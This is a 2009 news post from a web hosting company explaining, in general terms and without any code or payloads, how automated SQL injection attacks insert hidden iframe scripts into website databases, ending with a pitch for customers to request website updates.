Search Ask Question My Account Make A Payment Home


SERVER STATUS:

Running




HOME > NEWS STAND > SQL INJECTIONS. WHAT IT MEANS FOR YOUR WEBSITE.


  Posted on Friday, May 15, 2009



SQL INJECTIONS. WHAT IT MEANS FOR YOUR WEBSITE.

There are many types of SQL Injections out there. The older types of injections found exploits in Microsoft Windows Servers & Microsoft SQL Server. These injections needed direct access to these servers in order to be performed.

Since these exploits have been patched a new breed of SQL Injections have arrived.

During, the beginning of the first quarter of 2008 (roughly around March) a new exploit has been discovered. This exploit does not rely on unpatched or open holes on Web Servers or Database Servers, like it's previous cousins, but now exploits vulnerabilities in Web Site Applications such as your website.

Hackers (mostly coming from China) are using what is called "Malbots". These malbots are automatic programs that utilize Search Engines to find websites with .asp?, .aspx? pages.

Once found, the malbots will trigger a SQL Command directly into the browser's Address bar to execute an insert of text into your records in your database and can even delete entire database tables within seconds!

Currently, this exploit has been tame and has not caused too much destruction (as to delete entire database tables). This injection is currently adding a script tag to database text fields so that once an end user hits the website it will open a hidden iframe which secretly directs the end user's browser to a .js file. While the contents of these javascript files vary and are hard to decipher (since they are written in Chinese), they all attempt to exploit vulnerabilities on end user's computers, which include already patched Microsoft vulnerabilities and vulnerable ActiveX Controls.

Any website that uses a database can potentially be exploited by the new breed of SQL Injections. MS SQL, Oracle, Access & MySQL databases can all be exploited to be hacked. It just depends on the type of SQL commands that are sent to the database. All website development languages also can be exploited such as, ASP, ASP.NET & PHP.

So, at this point, no website can be considered safe unless the developed code strictly prohibits the use of such SQL commands from the Address bar and even user inputted fields such as Billing Information on a website's checkout process.

Since this new vulnerability has just recently been exploited, all Intersoft's customers that are using a database are subject to this exploit. It is highly recommend that customers contact your Sales Representatives for a website update at 1.888.WEB.7228.




[ RSS ]